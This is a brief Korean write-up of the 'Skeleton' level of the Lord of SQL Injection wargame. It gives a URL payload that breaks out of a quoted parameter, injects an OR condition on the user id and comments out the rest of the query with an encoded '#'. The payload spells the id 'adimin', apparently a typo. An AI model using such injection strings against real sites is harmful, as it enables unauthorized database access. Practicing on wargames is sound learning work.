[Load of SQL Injection] Skeleton

뒤에있는 and 1=0을 참으로 만들긴 어렵다. 

때문에 주석처리를 해주면 된다. 

 

URL 뒤에

?pw=1'or id='adimin'%23

(%23은 '#'을 URL 인코딩한 것)

을 입력하면 정답

 

 

++ 왜 '--'는 안되는가 ;;;ㅠㅜㅠ

++ #뒤에 공백을 붙여도 안되는가 ㅠㅜㅠ